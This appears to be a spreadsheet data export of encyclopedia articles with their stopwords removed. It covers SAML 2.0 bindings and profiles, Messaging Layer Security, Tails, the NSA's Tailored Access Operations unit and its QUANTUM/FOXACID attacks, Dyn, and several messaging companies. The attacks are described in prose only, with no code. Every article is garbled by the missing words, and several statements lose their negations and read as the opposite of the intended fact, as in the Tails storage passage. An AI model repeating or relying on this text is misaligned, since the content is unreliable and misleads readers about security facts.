following protocols specified samlcore: assertion query request protocol authentication request protocol artifact resolution protocol name identifier management protocol single logout protocol name identifier mapping protocolthe important protocols—the authentication request protocol—is discussed detail below. authentication request protocol saml browser profiles initiated identity provider (idp), unsolicited &lt;samlp:response&gt; element transmitted identity provider service provider (via browser). (the prefix samlp: denotes saml protocol namespace.) saml 2.0, however, flow begins service provider issues explicit authentication request identity provider. resulting authentication request protocol significant feature saml 2.0. when principal entity acting principal's behalf) wishes obtain assertion containing authentication statement, &lt;samlp:authnrequest&gt; element transmitted identity provider: &lt;samlp:authnrequest&gt; element, implicitly requests assertion containing authentication statement, evidently issued service provider (https://sp.example.com/saml2) subsequently presented identity provider (via browser). identity provider authenticates principal necessary) issues authentication response, transmitted back service provider (again browser). artifact resolution protocol saml message transmitted entity another either value reference. reference saml message called artifact. receiver artifact resolves reference sending &lt;samlp:artifactresolve&gt; request directly issuer artifact, responds actual message referenced artifact. suppose, example, identity provider sends following &lt;samlp:artifactresolve&gt; request directly service provider (via back channel): response, service provider returns saml element referenced enclosed artifact. this protocol forms basis http artifact binding. saml bindings bindings supported saml outlined bindings specification (samlbind): saml soap binding (based soap 1.1) reverse soap (paos) binding http redirect binding http post binding http artifact binding saml bindingfor browser sso, http redirect binding http post binding commonly used. example, service provider http redirect send request identity provider uses http post transmit response. this example illustrates entity's choice binding independent partner's choice binding. http redirect binding saml protocol messages carried directly query string http request. since length urls limited practice, http redirect binding suitable short messages, &lt;samlp:authnrequest&gt; message. longer messages (e.g. containing signed encrypted saml assertions, saml responses) usually transmitted bindings http post binding. saml requests responses transmitted http redirect samlrequest samlresponse query string parameter, respectively. before sent, message deflated (without header checksum), base64-encoded, url-encoded, order. upon receipt, process reversed recover original message. example, encoding &lt;samlp:authnrequest&gt; message yields: https://idp.example.org/saml2/sso/redirect?samlrequest=fzffa8iwfmxfbb9dyxvajtz1bqsurrc2 mabbw95ivc5am3tjrxpffmmly3%2fa15pzuyf33on8xjxbcaxtrmeehtejqbdmr%2frbrp63k3pl5rphyopkvdy ib%2fcon%2bc9ayfdqrb4wdvrvwwksvoy6zqtwlbgbbzik9%2ffcr7gorygtwfk8pu6dknnwkl%2fweetlxmr8s bhbhjdwzqokgdsrjm0kfqajcuj43kx8s78ctniz%2blp5xpya4dso1fjokgm03i8jsecmzgevha2%2fbk5mno1f dgn2jmqplmhc0b6wtmivbsgotf5qv66zq2t60x0wxz2rkydicjxh3cwvv1cwjgqanfl0%2bin8xutxyovzl18nk uqplvzr5el%2bvhykagzqdsa6fwvszxe63w2itrtq2cvakv2cjssql1v9p%2faxv4c message (formatted readability) signed additional security. practice, data contained &lt;samlp:authnrequest&gt;, issuer contains nameidpolicy, agreed beforehand (via manual information exchange saml metadata). case signing request security constraint. when &lt;samlp:authnrequest&gt; contains information known beforehand, assertion consumer service url, signing request recommended security purposes. http post binding following example, service provider identity provider http post binding. initially, service provider responds request user agent document containing xhtml form: value samlrequest parameter base64-encoding &lt;samlp:authnrequest&gt; element, transmitted identity provider browser. service identity provider validates request responds document containing another xhtml form: value samlresponse parameter base64 encoding &lt;samlp:response&gt; element, likewise transmitted service provider browser. automate submission form, following line javascript appear anywhere xhtml page: this assumes, course, first form element page contains samlresponse containing form element (forms[0]). http artifact binding http artifact binding uses artifact resolution protocol saml soap binding (over http) resolve saml message reference. consider following specific example. suppose service provider wants send &lt;samlp:authnrequest&gt; message identity provider. initially, service provider transmits artifact identity provider http redirect: https://idp.example.org/saml2/sso/artifact?samlart=artifact next identity provider sends &lt;samlp:artifactresolve&gt; request (such artifactresolverequest shown earlier) directly service provider back channel. finally, service provider returns &lt;samlp:artifactresponse&gt; element containing referenced &lt;samlp:authnrequest&gt; message: course flow direction well, identity provider issue artifact, fact common. see, example, "double artifact" profile example later topic. artifact format general, saml artifact defined follows (samlbind): saml_artifact (typecode endpointindex remainingartifact) typecode byte1byte2 endpointindex byte1byte2 thus saml artifact consists three components: two-byte typecode, two-byte endpointindex, arbitrary sequence bytes called remainingartifact. these three pieces information concatenated base64-encoded yield complete artifact. typecode uniquely identifies artifact format. saml predefines artifact, type 0x0004. endpointindex reference particular artifact resolution endpoint managed artifact issuer (which either mentioned earlier). remainingartifact, determined type definition, "meat" artifact. format type 0x0004 artifact defined follows: typecode 0x0004 remainingartifact sourceid messagehandle sourceid 20-byte_sequence messagehandle 20-byte_sequence thus type 0x0004 artifact size bytes (unencoded). sourceid arbitrary sequence bytes, although practice, sourceid sha-1 hash issuer's entityid. messagehandle random sequence bytes references saml message artifact issuer willing produce on-demand. example, consider hex-encoded type 0x0004 artifact: 00040000c878f3fd685c833eb03a3b0e1daa329d47338205e436913660e3e917549a59709fd8c91f2120222f look closely, typecode (0x0004) endpointindex (0x0000) front artifact. next bytes sha-1 hash issuer's entityid (https://idp.example.org/saml2) followed random bytes. base64-encoding bytes artifactresolverequest example above. saml profiles saml 2.0, saml 1.1, primary case still browser sso, scope saml broader previous versions saml, suggested following exhaustive list profiles: profiles browser profile enhanced client proxy (ecp) profile identity provider discovery profile single logout profile name identifier management profile artifact resolution profile assertion query/request profile name identifier mapping profile saml attribute profiles basic attribute profile x.500/ldap attribute profile uuid attribute profile attribute profile xacml attribute profilealthough number supported profiles quite large, profiles specification (samlprof) simplified since binding aspects profile factored separate bindings specification (samlbind). browser profile saml specifies browser profile involving identity provider (idp), service provider (sp), principal wielding http user agent. service provider four bindings choose identity provider three, leads twelve possible deployment scenarios. outline three deployment scenarios below. redirect request; post response this common scenarios. service provider sends saml request service using http-redirect binding. identity provider returns saml response assertion consumer service using http-post binding. message flow begins request secured resource service provider. request target resource principal (via http user agent) requests target resource service provider: https://sp.example.com/myresource service provider performs security check behalf target resource. valid security context service provider already exists, skip steps 2–7. service provider kind mechanism discover identity provider used, e.g., user, preconfigured idp, etc. redirect service service provider generates appropriate samlrequest (and relaystate, any), redirects browser service using standard http redirect. relaystate token opaque reference state information maintained service provider. value samlrequest parameter deflated, base64-encoded url-encoded value &lt;samlp:authnrequest&gt; element: samlrequest signed using signing key. typically, however, necessary. request service user agent issues request service identity provider: values samlrequest relaystate parameters provided redirect. service identity provider processes &lt;samlp:authnrequest&gt; element url-decoding, base64-decoding inflating request, order) performs security check. user valid security context, identity provider identifies user mechanism (details omitted). respond xhtml form service validates request responds document containing xhtml form: value relaystate parameter preserved step value samlresponse parameter base64 encoding following &lt;samlp:response&gt; element: request assertion consumer service user agent issues post request assertion consumer service service provider: values samlresponse relaystate parameters taken xhtml form step redirect target resource assertion consumer service processes response, creates security context service provider redirects user agent target resource. request target resource user agent requests target resource service provider (again): https://sp.example.com/myresource respond requested resource since security context exists, service provider returns resource user agent. post request; post response this relatively simple deployment saml browser profile (samlprof) service provider (sp) identity provider (idp) http post binding. message flow begins request secured resource request target resource principal (via http user agent) requests target resource service provider: https://sp.example.com/myresource service provider performs security check behalf target resource. valid security context service provider already exists, skip steps 2–7. respond xhtml form service provider responds document containing xhtml form: relaystate token opaque reference state information maintained service provider. value samlrequest parameter base64 encoding following &lt;samlp:authnrequest&gt; element: before &lt;samlp:authnrequest&gt; element inserted xhtml form, first base64-encoded. request service user agent issues post request service identity provider: values samlrequest relaystate parameters taken xhtml form step service processes &lt;samlp:authnrequest&gt; element url-decoding, base64-decoding inflating request, order) performs security check. user valid security context, identity provider identifies user (details omitted). respond xhtml form service validates request responds document containing xhtml form: value relaystate parameter preserved step value samlresponse parameter base64 encoding following &lt;samlp:response&gt; element: request assertion consumer service user agent issues post request assertion consumer service service provider: values samlresponse relaystate parameters taken xhtml form step redirect target resource assertion consumer service processes response, creates security context service provider redirects user agent target resource. request target resource user agent requests target resource service provider (again): https://sp.example.com/myresource respond requested resource since security context exists, service provider returns resource user agent. redirect artifact; redirect artifact this complex deployment saml browser profile (samlprof) service provider (sp) identity provider (idp) http artifact binding. both artifacts delivered respective endpoints http get. message flow begins request secured resource request target resource principal (via http user agent) requests target resource service provider: https://sp.example.com/myresource service provider performs security check behalf target resource. valid security context service provider already exists, skip steps 2–11. redirect single sign-on (sso) service service provider redirects user agent single sign-on (sso) service identity provider. relaystate parameter samlart parameter appended redirect url. request service user agent requests service identity provider: https://idp.example.org/saml2/sso/artifact?samlart=artifact_1&amp;relaystate=token token opaque reference state information maintained service provider artifact_1 saml artifact, issued step request artifact resolution service service dereferences artifact sending &lt;samlp:artifactresolve&gt; element bound saml soap message artifact resolution service service provider: value &lt;samlp:artifact&gt; element saml artifact transmitted step respond saml authnrequest artifact resolution service service provider returns &lt;samlp:artifactresponse&gt; element (containing &lt;samlp:authnrequest&gt; element) bound saml soap message service identity provider: service processes &lt;samlp:authnrequest&gt; element performs security check. user valid security context, identity provider identifies user (details omitted). redirect assertion consumer service service identity provider redirects user agent assertion consumer service service provider. previous relaystate parameter samlart parameter appended redirect url. request assertion consumer service user agent requests assertion consumer service service provider: https://sp.example.com/saml2/sso/artifact?samlart=artifact_2&amp;relaystate=token token token value step artifact_2 saml artifact issued step request artifact resolution service assertion consumer service dereferences artifact sending &lt;samlp:artifactresolve&gt; element bound saml soap message artifact resolution service identity provider: value &lt;samlp:artifact&gt; element saml artifact transmitted step respond saml assertion artifact resolution service identity provider returns &lt;samlp:artifactresponse&gt; element (containing &lt;samlp:response&gt; element) bound saml soap message assertion consumer service service provider: redirect target resource assertion consumer service processes response, creates security context service provider redirects user agent target resource. request target resource user agent requests target resource service provider (again): https://sp.example.com/myresource respond requested resource since security context exists, service provider returns resource user agent. identity provider discovery profile saml identity provider discovery profile introduces following concepts: common domain common domain cookie common domain cookie writing service common domain cookie reading serviceas hypothetical example common domain, let's suppose example (example.co.uk) example deutschland (example.de) belong virtual organization example global alliance (example.com). example, domain example.com common domain. both example example deutschland presence domain (uk.example.com de.example.com, resp.). common domain cookie secure browser cookie scoped common domain. browser user, cookie stores history list recently visited idps. name value cookie specified discovery profile (samlprof). after successful authentication, requests common domain cookie writing service. this service appends idp's unique identifier common domain cookie. receives unauthenticated request protected resource, requests common domain cookie reading service discover browser user's recently used idp. assertion query/request profile assertion query/request profile general profile accommodates numerous types so-called queries using following saml elements: &lt;samlp:assertionidrequest&gt; element, used request assertion given unique identifier (id) &lt;samlp:subjectquery&gt; element, abstract extension point allows subject-based saml queries defined &lt;samlp:authnquery&gt; element, used request existing authentication assertions given subject authentication authority &lt;samlp:attributequery&gt; element, used request attributes given subject attribute authority &lt;samlp:authzdecisionquery&gt; element, used request authorization decision trusted third partythe saml soap binding often used conjunction queries. saml attribute query attribute query perhaps important type saml query. often requester, acting behalf principal, queries identity provider attributes. below give example query issued principal directly: note issuer subject case. this sometimes called attribute self-query. identity provider might return following assertion, wrapped &lt;samlp:response&gt; element (not shown): contrast bearerassertion shown earlier, assertion longer lifetime corresponding lifetime x.509 certificate principal used authenticate identity provider. moreover, since assertion signed, user push assertion relying party, long user prove possession corresponding private (hence name "holder-of-key"), relying party assured assertion authentic. saml metadata quite literally, metadata makes saml work work well). some important uses metadata include: service provider prepares transmit &lt;samlp:authnrequest&gt; element identity provider browser. service provider know identity provider authentic evil identity provider trying phish user's password? service provider consults list trusted identity providers metadata issuing authentication request. previous scenario, service provider know send user authentication request? service provider looks pre-arranged endpoint location trusted identity provider metadata. identity provider receives &lt;samlp:authnrequest&gt; element service provider browser. identity provider know service provider authentic evil service provider trying harvest personally identifiable information regarding user? identity provider consults list trusted service providers metadata issuing authentication response. previous scenario, identity provider encrypt saml assertion trusted service provider (and trusted service provider) decrypt assertion. identity provider uses service provider's encryption certificate metadata encrypt assertion. continuing previous scenario, identity provider know send user authentication response? identity provider looks pre-arranged endpoint location trusted service provider metadata. service provider know authentication response came trusted identity provider? service provider verifies signature assertion using public identity provider metadata. service provider know resolve artifact received trusted identity provider? service provider looks pre-arranged endpoint location identity provider's artifact resolution service metadata.metadata ensures secure transaction identity provider service provider. before metadata, trust information encoded implementation proprietary manner. sharing trust information facilitated standard metadata. saml provides well-defined, interoperable metadata format entities leverage bootstrap trust process. identity provider metadata identity provider publishes data &lt;md:entitydescriptor&gt; element: note following details entity descriptor: entityid attribute unique identifier entity. validuntil attribute gives expiration date metadata. &lt;ds:signature&gt; element (which omitted simplicity) contains digital signature ensures authenticity integrity metadata. organization identified &lt;md:organization&gt; element "responsible entity" described entity descriptor (section 2.3.2 samlmeta). contact information &lt;md:contactperson&gt; element identifies technical contact responsible entity. multiple contacts contact types possible. section 2.3.2.2 samlmeta.by definition, identity provider manages service supports saml browser profile specified samlprof. see, example, identity provider described &lt;md:idpssodescriptor&gt; element shown next section. service metadata service identity provider described &lt;md:idpssodescriptor&gt; element: previous metadata element describes service identity provider. note following details element: identity provider software configured private saml signing and/or private back-channel key. corresponding public included &lt;md:keydescriptor use="signing"&gt; element metadata. material omitted descriptor brevity. binding attribute &lt;md:artifactresolutionservice&gt; element indicates saml soap binding (samlbind) used artifact resolution. location attribute &lt;md:artifactresolutionservice&gt; element used step "double artifact" profile. value index attribute &lt;md:artifactresolutionservice&gt; element used endpointindex construction saml type 0x0004 artifact. &lt;md:nameidformat&gt; elements indicate saml name identifier formats (samlcore) service supports. binding attributes &lt;md:singlesignonservice&gt; elements standard uris specified saml binding specification (samlbind). location attribute &lt;md:singlesignonservice&gt; element supports http post binding used step "double post" profile. location attribute &lt;md:singlesignonservice&gt; element supports http artifact binding used step "double artifact" profile. &lt;saml:attribute&gt; element describes attribute identity provider willing assert (subject policy). &lt;saml:attributevalue&gt; elements enumerate possible values attribute take on.as noted beginning section, values location attributes used service provider route saml messages, minimizes possibility rogue identity provider orchestrating man-in-the-middle attack. service provider metadata like identity provider, service provider publishes data &lt;md:entitydescriptor&gt; element: note following details entity descriptor: entityid attribute unique identifier entity. validuntil attribute gives expiration date metadata. &lt;ds:signature&gt; element (which omitted simplicity) contains digital signature ensures authenticity integrity metadata. organization identified &lt;md:organization&gt; element "responsible entity" described entity descriptor (section 2.3.2 samlmeta). contact information &lt;md:contactperson&gt; element identifies technical contact responsible entity. multiple contacts contact types possible. section 2.3.2.2 samlmeta.by definition, service provider manages assertion consumer service supports saml browser profile specified samlprof. see, example, service provider described &lt;md:spssodescriptor&gt; element shown next section. assertion consumer service metadata assertion consumer service contained &lt;md:spssodescriptor&gt; element: note following details &lt;md:spssodescriptor&gt; metadata element: service provider software configured private saml signing and/or private back-channel key. corresponding public included &lt;md:keydescriptor use="signing"&gt; element metadata. material omitted descriptor brevity. likewise service provider software configured private saml decryption key. public saml encryption included &lt;md:keydescriptor use="encryption"&gt; element metadata. material omitted descriptor brevity. index attribute &lt;md:assertionconsumerservice&gt; element used value assertionconsumerserviceindex attribute &lt;samlp:authnrequest&gt; element. binding attributes &lt;md:assertionconsumerservice&gt; elements standard uris specified saml binding specification (samlbind). location attribute &lt;md:assertionconsumerservice&gt; element supports http post binding (index="0") used step "double post" profile. location attribute &lt;md:assertionconsumerservice&gt; element supports http artifact binding (index="1") used step "double artifact" profile. &lt;md:attributeconsumingservice&gt; element used identity provider formulate &lt;saml:attributestatement&gt; element pushed service provider conjunction browser sso. index attribute &lt;md:attributeconsumingservice&gt; element used value attributeconsumingserviceindex attribute &lt;samlp:authnrequest&gt; element.as noted beginning section, values location attributes used identity provider route saml messages, minimizes possibility rogue service provider orchestrating man-in-the-middle attack. metadata aggregates previous examples, &lt;md:entitydescriptor&gt; element shown digitally signed. practice, however, multiple &lt;md:entitydescriptor&gt; elements grouped together &lt;md:entitiesdescriptor&gt; element single digital signature entire aggregate: note following details &lt;md:entitiesdescriptor&gt; element: digital signature (which omitted brevity) covers entire aggregate. validuntil attribute elevated parent element, implying expiration date applies child element. namespace declarations elevated parent element avoid redundant namespace declarations.typically metadata aggregates published trusted third parties called federations vouch integrity metadata aggregate. note metadata aggregates large, composed hundreds even thousands entities aggregate. also security assertion markup language saml saml metadata saml-based products services openid connect references primary references: secondary references: deprecated references:</t>
  </si>
  <si>
    <t>Messaging Layer Security</t>
  </si>
  <si>
    <t>messaging layer security (mls), security layer end-to-end encrypting messages arbitrarily sized groups. built ietf working group designed efficient, practical secure. security properties security properties include message confidentiality, message integrity authentication, membership authentication, asynchronicity, forward secrecy, post-compromise security, scalability. history idea born 2016 first discussed unofficial meeting ietf berlin attendees wire, mozilla cisco.initial ideas based pairwise encryption secure group communication. 2017, academic paper introducing asynchronous ratcheting trees published university oxford setting focus efficient encryption schemes.the first took place february 2018 ietf london. founding members mozilla, facebook, wire, google, twitter, university oxford, inria. implementations openmls: language: rust, license: mls++: language: c++, license: bsd-2 references</t>
  </si>
  <si>
    <t>Tails (operating system)</t>
  </si>
  <si>
    <t>tails, amnesic incognito live system, security-focused debian-based linux distribution aimed preserving privacy anonymity. connects internet exclusively anonymity network tor. system designed booted live live usb, leaves digital footprint machine unless explicitly told also virtual machine, additional security risks. project provided financial support development beginnings project, continues alongside numerous corporate anonymous sponsors. history tails first released june 2009. next iteration development incognito, discontinued gentoo-based linux distribution. project provided financial support development beginnings project. tails also received funding open technology fund, mozilla, freedom press foundation.laura poitras, glenn greenwald, barton gellman said tails important tool used work national security agency whistleblower edward snowden.from release 3.0, tails requires 64-bit processor run. features tails's pre-installed desktop environment gnome system includes essential software functions reading editing documents, image editing, video watching printing. other software debian installed user's behest.tails includes unique variety software handles encryption files internet transmissions, cryptographic signing hashing, functions important security. pre-configured multiple connection options. tries force connections blocks connection attempts outside tor. networking, features modified version browser inclusion ublock origin, instant messaging, email, file transmission monitoring local network connections security.by design, tails "amnesic". runs computer's random access memory (ram) write hard drive storage medium. user choose keep files, applications settings tails drive "persistent storage". though persistent storage encrypted default, hidden detectable forensic analysis. while shutting down, tails overwrites used avoid cold boot attack. security incidents 2014 erste reported nsa's xkeyscore surveillance system sets threat definitions people search tails using search engine visit tails website. comment xkeyscore's source code calls tails comsec [communications security] mechanism advocated extremists extremist forums".in year, spiegel published slides internal national security agency presentation dating june 2012, deemed tails "major threat" mission conjunction privacy tools "catastrophic".in 2017, used malicious code developed facebook, identifying sexual extortionist tails user buster hernandez zero-day vulnerability default video player. exploit never explained discovered tails developers, believed vulnerability patched later release tails. easy find hernandez: long time, facebook searched success, resorting developing custom hacking tool. also references external links official website tails distrowatch tails distrotest, free online emulator operating systems.</t>
  </si>
  <si>
    <t>Messaging Architects</t>
  </si>
  <si>
    <t>messaging architects (ma) canadian software company specializing e-mail products. their flagship product netmail, integrated email management platform. history launched march 1995 chronofax, company distributor computer-based software. chronofax became tobit software north america result partnership german company called tobit produced software novell netware groupwise markets. when three-and-a-half-year partnership tobit ended, company renamed itself, messaging architects. messaging architects initially provided add-ons novell groupwise messaging platform. company offers integrated email management platform called netmail. netmail consolidates company's portfolio email software includes: netmail secure (formerly gwguardian m+guardian), netmail archive (formerly m+archive), netmail search, netmail migrate (formerly migrator), netmail store (formerly m+securestore). company also provides email platform migration services. messaging architects professional services team full novell microsoft exchange certification. messaging architects works messaging platform providers provide solutions microsoft exchange, novell groupwise, lotus notes. from late 2008 mark crispin, inventor imap, worked messaging architects senior software engineer, developing entirely imap server based upon distributed mail store, extending format. industry recognition messaging architects' email security email archiving software positioned gartner magic quadrant reports. 2009, m+archive positioned magic quadrant email active archiving.in 2009, m+guardian email security system achieve gold vbspam platinum awards virus bulletin's anti-spam certification. services messaging architects also offers range remote on-site services managing email risk co-existence different email platforms, including professional services, email migration services, email consulting, email policy training. references</t>
  </si>
  <si>
    <t>Durationator</t>
  </si>
  <si>
    <t>durationator copyright tool developed tulane school elizabeth townsend gard team students. purpose tool determine term, duration, copyright. licensed limited times, social venture, develop product. durationator takes research done school transforms code using designed accessible tool, determine copyright status work.the durationator began idea 2007, matt miller, student previous coding experience, applied research assistant. townsend gard working copyright, particular copyright status works. legals terms complicated, idea blend research code. initial estimates project completed summer. although initial "logic engine" durationator code prototype legal framework developed summer, process researching worldwide laws reducing laws finite number questions discrete answers took years. research focused elements need making decision status work whatever country searched. these elements vary greatly. team also attempted gather every regarding copyright, creating searchable database. tool uses logicnets platform, logic tree search engine. durationator indirectly cited u.s. justice stephen breyer golan holder, referencing complexity copyright need code sort out. references external links limited times</t>
  </si>
  <si>
    <t>Tailored Access Operations</t>
  </si>
  <si>
    <t>office tailored access operations (tao), computer network operations, structured s32, cyber-warfare intelligence-gathering unit national security agency (nsa). active since least 1998, possibly 1997, named structured "the last days 2000," according general michael hayden.tao identifies, monitors, infiltrates, gathers intelligence computer systems used entities foreign united states. history reportedly "the largest arguably important component nsa's huge signals intelligence directorate (sid), consisting 1,000 military civilian computer hackers, intelligence analysts, targeting specialists, computer hardware software designers, electrical engineers". snowden leak document leaked former contractor edward snowden describing unit's work says software templates allowing break commonly used hardware, including "routers, switches, firewalls multiple product vendor lines". engineers prefer networks rather isolated computers, typically many devices single network. organization tao's headquarters termed remote operations center (roc) based headquarters fort meade, maryland. also expanded hawaii (wahiawa, oahu), georgia (fort gordon, georgia), texas (joint base antonio, texas), colorado (buckley space force base, denver). s321 remote operations center (roc) remote operations center, employees gather information around world. s323 data network technologies branch (dnt) develops automated spyware s3231 access division (acd) s3232 cyber networks technology division (cnt) s3233 s3234 computer technology division (ctd) s3235 network technology division (ntd) telecommunications network technologies branch (tnt) improve network computer hacking methods mission infrastructure technologies branch: operates software provided s328 access technologies operations branch (ato): reportedly includes personnel seconded fbi, perform described "off-net operations", means arrange agents surreptitiously plant eavesdropping devices computers telecommunications systems overseas tao's hackers remotely access fort meade. specially equipped submarines, currently jimmy carter, used wiretap fibre optic cables around globe. s3283 expeditionary access operations (eao) s3285 persistence division virtual locations details program titled quantumsquirrel indicate ability masquerade routable ipv4 ipv6 host. this enables computer generate false geographical location personal identification credentials accessing internet utilizing quantumsquirrel. leadership from 2013 2017, head joyce, 25-plus year employee previously worked nsa's information assurance directorate (iad). january 2016, joyce rare public appearance gave presentation usenix’s enigma conference. catalog catalog 50-page classified document listing technology available united states national security agency (nsa) tailored access operations (tao) advanced network technology (ant) division cyber surveillance. most devices described already operational available nationals members five eyes alliance. according spiegel, released catalog public december 2013, "the list reads like mail-order catalog, employees order technologies division tapping targets' data." document created 2008. security researcher jacob appelbaum gave speech chaos communications congress hamburg, germany, detailed techniques simultaneously published spiegel article coauthored disclosed catalog. quantum attacks developed attack suite call quantum. relies compromised router duplicates internet traffic, typically http requests, intended target site (indirectly). site runs foxacid software sends back exploits load background target browser intended destination chance respond (it's unclear compromised router facilitates race return trip). prior development technology, foxacid software made spear-phishing attacks referred spam. browser exploitable, permanent "implants" (rootkits etc.) deployed target computer, e.g. olympusfire windows, give complete remote access infected machine. this type attack part man-in-the-middle attack family, though specifically called man-on-the-side attack. difficult pull without controlling internet backbone.there numerous services foxacid exploit way. names foxacid modules given below: collaboration british government communications headquarters (gchq) (muscular), google services could attacked too, including gmail.finding machines exploitable worth attacking done using analytic databases xkeyscore. specific method finding vulnerable machines interception windows error reporting traffic, logged xkeyscore.quantum attacks launched sites slow combinations targets services essentially exploit race condition, i.e. server trying beat legitimate server response. mid-2011, prototyping capability codenamed qfire, involved embedding exploit-dispensing servers virtual machines (running vmware esx) hosted closer target, so-called special collection sites (scs) network worldwide. goal qfire lower latency spoofed response, thus increasing probability success.commendeer [sic] used commandeer (i.e. compromise) untargeted computer systems. software used part quantumnation, also includes software vulnerability scanner validator. tool first described 2014 chaos communication congress jacob appelbaum, characterized tyrannical.quantumcookie complex form attack used users. known targets collaborations suspected confirmed targets tailored access operations unit include national international entities like china, opec, mexico's secretariat public security.the group also targeted global communication networks sea-me-we optical fibre submarine communications cable system carries telecommunications singapore, malaysia, thailand, bangladesh, india, lanka, pakistan, united arab emirates, saudi arabia, sudan, egypt, italy, tunisia, algeria france. additionally, försvarets radioanstalt (fra) sweden gives access fiber optic links quantum cooperation.tao's quantum insert technology passed services, particularly gchq's mynoc, used target belgacom gprs roaming exchange (grx) providers like comfone, syniverse, starhome. belgacom, provides services european commission, european parliament european council discovered attack.in concert fbi, used intercept laptops purchased online, divert secret warehouses spyware hardware installed, send customers. also targeted internet browsers firefox.according 2013 article foreign policy, become "increasingly accomplished mission, thanks part high-level cooperation secretly receives 'big three' american telecom companies (at&amp;t, verizon sprint), large us-based internet service providers, many computer security software manufacturers consulting companies." 2012 budget document claims companies, tao's behest, "insert vulnerabilities commercial encryption systems, systems, networks endpoint communications devices used targets". number companies, including cisco dell, subsequently made public statements denying insert back doors products. microsoft provides advance warning vulnerabilities knows about, fixes information vulnerabilities available public; enables execute so-called zero-day attacks. microsoft official declined identified press confirmed indeed case, said microsoft cannot held responsible uses advance information. also advanced persistent threat cyberwarfare united states equation group magic lantern (software) minipanzer megapanzer unit 61398 stuxnet syrian electronic army warrior pride references external links inside tao: documents reveal hacking unit 'hacking unit' infiltrates computers around world report tailored access operations https://www.wired.com/threatlevel/2013/09/nsa-router-hacking/ https://www.nytimes.com/2014/01/15/us/nsa-effort-pries-open-computers-not-connected-to-internet.html getting 'ungettable' intelligence: interview tao's teresa shea</t>
  </si>
  <si>
    <t>MessageNet systems</t>
  </si>
  <si>
    <t>messagenet systems privately held company sells primarily software-based product called "connections" facilitating organization's emergency routine communications. company overview messagenet systems located carmel, indiana, united states, active much country primary product called "connections", consist combination several features capabilities (which outlined explained briefly, later article), depending organization's needs. market involvement messagenet systems participates marketplace direct sales, partnerships resellers, agreements third parties. part sales efforts expansion goals, company recently participated channel partners conference expo, vegas. timeline 1991 founded name "orchid systems." 1996 changed name "messagenet systems" adopted corresponding logo. 2011 messagenet became active education-oriented video production addition marketing), started company youtube channel. 2012 changed branding updated logo, color scheme, slightly modified name represented logo, visible right) "messagenet systems" rather "messagenet systems" (the difference lower-case "systems"). product messagenet's main (and only) offering all-encompassing product called "connections." connections connections broad product include several different features capabilities, depending customer's needs. notable environments product well-suited for, include: noisy manufacturing environments, traditional systems effective sprawling campus settings require mass notification capability, well discrete room location-based ability focus specific communications schools deaf blind, equal access education, everyday, emergency information challenging achieveconnections example emergency communication system. according company's marketing materials, "messagenet connections browser-based, integrated system unifies private public, everyday emergency communications powerful system. connections integrates existing communication systems create communication bridges people, places, things. unique advantages messagenet connections system scalability: start specific needs now, later uniquely upgrade system include additional functionality." mediaport digital signage system, using high-definition flat panel displays display many types media, including presentation-style slide-shows, high-definition video, emergency evacuation routing, two-way video-conferencing, photographs, text messages, scrolling news tickers, daily emergency uses. visual system designed deliver visual public address messages authorized running browser electronic sign boards room, throughout entire campus, across wan. alert delivers alert emergency messages any, all, network popping message window scrolling person event terminates pagestation advanced text messaging software system provides real-time text messaging pagers, pdas, twitter, cell phones, authorized computer network. mesa enterprise security alerting features integrate enhance existing building's automation, fire safety, security systems. adapts prioritizes alerts variety safety security systems delivery spectrum communication devices used enterprise. callvista voice communication system integrates desk phones, home phones, cell phones, wireless phones videophones. includes autodialing phone directory, in/out whiteboard functionality, more. securepa software interface extends utility, security, ease-of-use overhead paging, intercom, mass notification systems. alternative product names throughout company's history growth main product evolved, consequently, undergone several name changes. following these: silent messenger visual intercom emacs (emergency management communications system) customer service messagenet systems' primary focus offering connections product; however, company provide services customers purchased, process purchasing connections. messagenet provides customer service well installation upgrade support. primary markets messagenet active markets: industrial manufacturing environments retail establishments universities higher education messagenet-derivative system currently used gulf coast community college. deaf blind schools mississippi school deaf according tech bytes newsletter, school implemented connections serve emergency system following features:allow staff react quickly incidents; security system monitor students, well reduce misconduct, vandalism, theft; electronic school bulletin board display schools events, lunch menus, calendar events campus; virtual media cart play control tapes, and/or dvds classroom without player, media, remote control; video contact system enable real-time video conversations staff members; off-campus control monitoring system allows responsible parties view cameras control devices remotely internet; broadcast system announcements made hearing sight-impaired student; professional development system allow teaching class multiple classrooms simultaneously, connect classroom existing distance learning class learning lab. hospitals medical facilities references</t>
  </si>
  <si>
    <t>SAML-based products and services</t>
  </si>
  <si>
    <t>security assertion markup language (saml) specifications encompasses xml-format security tokens containing assertions pass information user protocols profiles implement authentication authorization scenarios. this article focus software services category identity management infrastructure, enable building web-sso solutions using saml protocol interoperable fashion. software services saml-enabled here. products provide saml actors saml actors identity providers (idp), service providers (sp), discovery services, clients, metadata services, broker/idp-proxy. this table shows capability products according kantara initiative testing. claimed capabilities column "other". each mark denotes least interoperability test passed. detailed results product test procedure versions available kantara/liberty site given below. note: this table represents snapshot time roll recent product test results (multiple testing rounds). please note products features abilities updated since last tested. please check website information originating product latest features updates. libraries toolkits develop saml actors saml-enabled services libraries toolkits used developers integrate applications services saml federations build saml-actors like idps. saml-related services this section lists public services identity attribute providers, metadata test services, *not* saml-enabled web-applications cloud services. references</t>
  </si>
  <si>
    <t>Dyn (company)</t>
  </si>
  <si>
    <t>dyn, inc. internet performance management application security company, offering products monitor, control, optimize online infrastructure, also domain registration services email products. company acquired oracle corporation 2016, operated global business unit oracle acquisition completed 2017. some services planned retired oracle 2023. history created community-led student project wilde, hired jeremy hitchcock, daly chris reinhardt undergraduate studies worcester polytechnic institute. eventually wilde brought hitchcock daly partners. originally, enabled students access computers print documents remotely. project moved towards domain name system (dns) services. first iteration free dynamic service known dyndns. project required $25,000 stay open, raised $40,000.the donation based model continued 2002, stopped launch "donator-only" services. later, premium service called dynect managed platform became available 2008, hiring kyle york, gray chynoweth cory wallenstein, business began scale. 2011: opened office london, eventually moved emea headquarters brighton. year, opened headquarters manchester, hampshire, united states.october 2012: completed series round venture capital funding totaling million north bridge venture partners. prior investment north bridge, company self funded.august 2013: launched annual geek summer camp event, business conference internet performance industry.april 2014: announced discontinuation free hostname services effective 7.september 2014: launched internet intelligence, saas-based product.may 2016: obtained equity funding us$50 million pamplona capital management; total funding $100m. company scaled approximately $100m annual recurring revenue prior acquisition oracle.may 2016: launched platform internet performance management.october 2016: colin doherty appointed company's ceo. 2016 attack october 2016, dyn's networks attacked three times distributed denial-of-service attack, causing major sites including twitter, reddit, github, amazon.com, netflix, spotify, runescape, quora, 